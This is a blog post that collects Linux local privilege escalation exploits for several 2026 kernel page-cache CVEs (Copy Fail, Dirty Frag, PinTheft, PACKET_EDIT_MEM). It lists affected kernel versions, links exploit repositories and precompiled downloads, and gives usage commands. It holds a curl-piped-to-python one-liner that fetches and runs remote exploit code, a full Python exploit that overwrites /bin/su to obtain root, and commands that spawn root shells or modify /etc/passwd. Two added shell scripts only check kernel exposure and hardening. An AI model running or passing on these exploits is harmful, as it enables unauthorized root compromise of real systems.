Linux LPE Collections
2026-07-01

Over the past two months, CoW-based LPEs have been sprouting up one after another. I have long wanted to write a complete LPE collection that clearly lists each CVE and the versions it applies to; having to hunt for them every time I need one is far too much hassle.

Copy Fail (CVE-2026-31431)

Affected versions

6.12: < 6.12.85
6.6: < 6.6.137
6.1: < 6.1.170
5.15: < 5.15.204
5.10: < 5.10.254
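The version list above is what a fleet owner wants to check mechanically rather than by eye. The following shell script is an added example, not code from the original post or any of the linked repositories: it compares a kernel release string against the fixed version listed above for each stable series and reports whether that kernel is below the fix. Series absent from the table (for example Ubuntu 24.04's 6.8 GA kernel) are reported as unknown rather than guessed. Caveat: enterprise kernels such as RHEL's 6.12.0-* carry backported fixes under an unchanged upstream version, so for those the distro advisory, not this comparison, is authoritative. Function names are my own.

```sh
#!/bin/sh
# Added example, not code from the original post: compare a kernel release
# string against the Copy Fail (CVE-2026-31431) fixed versions listed above.

# Fixed version per stable series, copied from the list above.
copyfail_fixed_version() {
    case "$1" in
        6.12) echo 6.12.85 ;;
        6.6)  echo 6.6.137 ;;
        6.1)  echo 6.1.170 ;;
        5.15) echo 5.15.204 ;;
        5.10) echo 5.10.254 ;;
        *)    return 1 ;;
    esac
}

# True when $1 < $2, comparing major.minor.patch numerically. A trailing
# suffix on the patch field ("85-generic") is dropped by awk's numeric
# conversion, which only reads the leading digits.
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        for (i = 1; i <= 3; i++) {
            p = (i <= n) ? x[i] + 0 : 0
            q = (i <= m) ? y[i] + 0 : 0
            if (p < q) exit 0
            if (p > q) exit 1
        }
        exit 1
    }'
}

# Prints "vulnerable", "patched" or "unknown" (series not in the table).
copyfail_status() {
    series=$(printf '%s' "$1" | awk -F. '{ print $1 "." $2 }')
    fixed=$(copyfail_fixed_version "$series") || { echo unknown; return 0; }
    if version_lt "$1" "$fixed"; then
        echo vulnerable
    else
        echo patched
    fi
}

# Usage: sh check-copyfail.sh "$(uname -r)"
if [ -n "${1:-}" ]; then
    copyfail_status "$1"
fi
```

The series lookup deliberately returns unknown instead of extrapolating: a 6.8 or 6.17 kernel is outside the table, and whether its distro has patched it must come from the distro's own changelog.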

Exploit

Official exploit one-liner:

curl https://copy.fail/exp | python3 && su

However, os.splice only exists in Python 3.10 and later, and the one-liner is golfed so hard that compatibility suffers. The following exploit is recommended instead:

#!/usr/bin/env python3
# This version uses ctypes as a drop-in for os.splice()
# so that it also runs on Python < 3.10, where os.splice does not exist.
import os as g,zlib,socket as s
import ctypes
libc = ctypes.CDLL("libc.so.6", use_errno=True)
_splice = libc.splice
_splice.argtypes = [
    ctypes.c_int, ctypes.c_void_p,
    ctypes.c_int, ctypes.c_void_p,
    ctypes.c_size_t, ctypes.c_uint
]
def splice(fd_in, fd_out, count, offset_src=None, flags=0):
    off_in = None
    if offset_src is not None:
        off_in = ctypes.pointer(ctypes.c_long(offset_src))
    res = _splice(fd_in, off_in, fd_out, None, count, flags)
    if res < 0:
        # os is imported as g above; the original referenced os.strerror,
        # which would raise NameError instead of the intended OSError.
        err = ctypes.get_errno()
        raise OSError(err, g.strerror(err))
    return res
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();splice(f, w, o, offset_src=0);splice(r, u.fileno(), o)
try:u.recv(8+t)
except:0
try:f=g.open("/bin/su",0)
except:f=g.open("/usr/bin/su",0)
i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

Copy Fail + K8s attack surface

Found a PoC; not yet verified, but it should work. Repository: https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC

Dirty Frag (CVE-2026-43284 (xfrm/ESP) + CVE-2026-43500 (RxRPC))

Also called Copy_Fail2. Same class of bug as CVE-2026-31431, but in different subsystems (XFRM/ESP | RxRPC).

Affected versions

Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64

Exploit

C implementation: https://github.com/v4bel/dirtyfrag
C implementation: https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
Python implementation: https://github.com/guiimoraes/CVE-2026-31431

C implementation, click to download: dirtyfrag.zip (statically compiled).

(ctf) tmp tree dirtyfrag
dirtyfrag
├── assets
│   ├── demo.gif
│   ├── tux.png
│   └── write-up.md
├── exp
├── exp.c
└── README.md
2 directories, 6 files

Usage:

./exp && id
# restore the polluted page cache
echo 3 > /proc/sys/vm/drop_caches

Another C implementation, which you can download directly: Copy_Fail2-Electric_Boogaloo.zip, already statically compiled (OrbStack Ubuntu, GLIBC 2.39-0ubuntu8.7).

(ctf) tmp tree Copy_Fail2-Electric_Boogaloo
Copy_Fail2-Electric_Boogaloo
├── aa-rootns
├── aa-rootns.c
├── copyfail2
├── copyfail2.c
├── ipv6
│   ├── copyfail2v6.c
│   └── run.sh
├── README.md
└── run.sh
2 directories, 8 files

Usage:

./run.sh # install + drop into root shell
./run.sh --clean # revert /etc/passwd via the same primitive

If it still fails (a static build should not), try compiling it yourself:

sudo apt install -y libssl-dev gcc
gcc -O2 -Wall copyfail2.c -o copyfail2 -lcrypto
gcc -O2 -Wall aa-rootns.c -o aa-rootns

The Python version has a one-liner, but on Ubuntu with apparmor_restrict_unprivileged_userns enabled you have to save it to a file first and then run it; piping it straight into the interpreter does not work:

curl -sL https://raw.githubusercontent.com/guiimoraes/copyfail2-py/main/exploit.py > /tmp/x.py
python3 /tmp/x.py

PinTheft (CVE-2026-43494 | requires RDS enabled)

This one is not much use, but it belongs to the same series, so I am collecting it anyway. Not vulnerable by default on most distros (RDS is rarely enabled).

Affected versions

  • Kernel with CONFIG_RDS and CONFIG_RDS_TCP enabled
  • io_uring enabled (kernel.io_uring_disabled=0)
  • Kernel ≥ 6.13 (for optimal io_uring features)
  • At least one readable SUID-root binary on the system
  • x86_64 architecture

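Because PinTheft depends on kernel configuration rather than on a version range, exposure is best judged from two files instead of by running anything. The following shell script is an added example, not code from the original post or the PinTheft repository: it reads a kernel config and the kernel.io_uring_disabled sysctl value, evaluates the two preconditions from the list above against constructed sample inputs, and prints the settings that remove them. Function names and sample files are my own.

```sh
#!/bin/sh
# Added example (not from the original post or the PinTheft repository):
# assess the PinTheft preconditions from a kernel config file and the
# kernel.io_uring_disabled sysctl, and print the settings that remove them.
# Function names and the sample inputs below are constructed for this example.

# Both CONFIG_RDS and CONFIG_RDS_TCP must be built in (y) or a module (m).
rds_enabled_in_config() {
    grep -Eq '^CONFIG_RDS=(y|m)$' "$1" && grep -Eq '^CONFIG_RDS_TCP=(y|m)$' "$1"
}

# kernel.io_uring_disabled: 0 = any process may create io_uring instances,
# 1 = only privileged processes or members of kernel.io_uring_group,
# 2 = nobody. An unprivileged LPE needs 0, so only 0 counts as exposed.
io_uring_open_to_unprivileged() {
    [ "$(cat "$1")" = 0 ]
}

# Prints "exposed" when both preconditions hold, "not-exposed" otherwise.
pintheft_exposure() {
    if rds_enabled_in_config "$1" && io_uring_open_to_unprivileged "$2"; then
        echo exposed
    else
        echo not-exposed
    fi
}

# Settings that close the preconditions. io_uring_disabled=2 breaks software
# that depends on io_uring, and a modprobe.d entry only helps when RDS is a
# module (CONFIG_RDS=m); a built-in RDS (=y) needs a different kernel build.
pintheft_hardening_commands() {
    cat <<'EOF'
sysctl -w kernel.io_uring_disabled=2
printf 'install rds /bin/true\ninstall rds_tcp /bin/true\n' > /etc/modprobe.d/disable-rds.conf
EOF
}

# Constructed sample inputs standing in for /boot/config-$(uname -r)
# and /proc/sys/kernel/io_uring_disabled.
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
printf 'CONFIG_RDS=m\nCONFIG_RDS_TCP=m\n' > "$tmp/config-rds"
printf '# CONFIG_RDS is not set\n' > "$tmp/config-nords"
printf '0\n' > "$tmp/io_uring_open"
printf '2\n' > "$tmp/io_uring_off"

pintheft_exposure "$tmp/config-rds"   "$tmp/io_uring_open"   # exposed
pintheft_exposure "$tmp/config-nords" "$tmp/io_uring_open"   # not-exposed
pintheft_exposure "$tmp/config-rds"   "$tmp/io_uring_off"    # not-exposed

# On a real host:
#   pintheft_exposure "/boot/config-$(uname -r)" /proc/sys/kernel/io_uring_disabled
```

The config check is the one that matters on most distributions: as the section notes, RDS is rarely enabled, and a host whose config has CONFIG_RDS unset never reaches the io_uring question.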

Exploit

Repository: https://github.com/0xBlackash/CVE-2026-43494.git

# 1. Clone & Compile
git clone https://github.com/0xBlackash/CVE-2026-43494.git
cd CVE-2026-43494
gcc -O2 -static CVE-2026-43494.c -o pintheft
# 2. Run
sudo ./pintheft

PACKET_EDIT_MEM (CVE-2026-46331 | 2026/06/17)

Affected versions (< v7.1-rc7)

| Distro | Kernel | Flag | Result |
| --- | --- | --- | --- |
| RHEL 10.0 | 6.12.0-228.el10 | (none) | ROOT |
| Debian 13 trixie | 6.12.90+deb13.1 | (none) | ROOT |
| Ubuntu 24.04.4 | 6.17.0-22 | --ubuntu | ROOT |
| Ubuntu 26.04 | 7.0.0-14-generic | --ubuntu | FAIL |

This table is from the official repository; in my own testing Ubuntu 24.04.4 with 6.17.0-35-generic also works, so any nearby version is worth testing.

Exploit

Official repository: https://github.com/sgkdev/packet_edit_meme

Precompiled archive (static build): packet_edit_meme.zip

(ctf) tmp tree packet_edit_meme
packet_edit_meme
├── Makefile
├── packet_edit_meme
├── packet_edit_meme.c
├── pedit_primitive.c
├── pedit_primitive.h
├── README.md
├── test_cve
└── test_cve.c
1 directory, 8 files

Note that Ubuntu has an AppArmor gate, so an aa-exec bypass is needed first; that has some preconditions, but a full Ubuntu install will most likely work directly.

Usage:

make
./packet_edit_meme
./packet_edit_meme --ubuntu # AppArmor-gated Ubuntu: aa-exec bypass first

DIRTYFAIL (collection)

This is not a single PoC; it is: Detector + PoC for Linux page-cache write vulnerabilities: Copy Fail (CVE-2026-31431) and Dirty Frag (CVE-2026-43284/43500).

A very comprehensive tool, convenient for testing and quick verification. Official repository: https://github.com/KaraZajac/DIRTYFAIL.git

Affected versions

| CVE / variant | Name | DIRTYFAIL coverage |
| --- | --- | --- |
| CVE-2026-31431 | Copy Fail (algif_aead authencesn page-cache write) | Detect + full PoC |
| CVE-2026-43284 v4 | Dirty Frag — IPv4 xfrm-ESP page-cache write | Detect + full PoC |
| CVE-2026-43284 v6 | Dirty Frag — IPv6 xfrm-ESP page-cache write (esp6) | Detect + full PoC |
| CVE-2026-43500 | Dirty Frag — RxRPC page-cache write | Detect + full PoC |
| Copy Fail GCM variant | xfrm-ESP rfc4106(gcm(aes)) page-cache write | Detect + full PoC |

Exploit

You can build it yourself from the official repository. A precompiled archive (static build) is provided here:

Click to download: DIRTYFAIL.zip

(ctf) tmp tree -L 1 DIRTYFAIL
DIRTYFAIL
├── build
├── dirtyfail
├── docs
├── LICENSE
├── Makefile
├── NOTICE.md
├── README.md
├── src
├── tests
└── tools
6 directories, 5 files

Usage: ./dirtyfail --help

https://blog.chaomixian.top/posts/linux-lpe-collections/
Author: 炒米线
Published: 2026-07-01
License: CC BY-NC-SA 4.0

Some of this information may be out of date.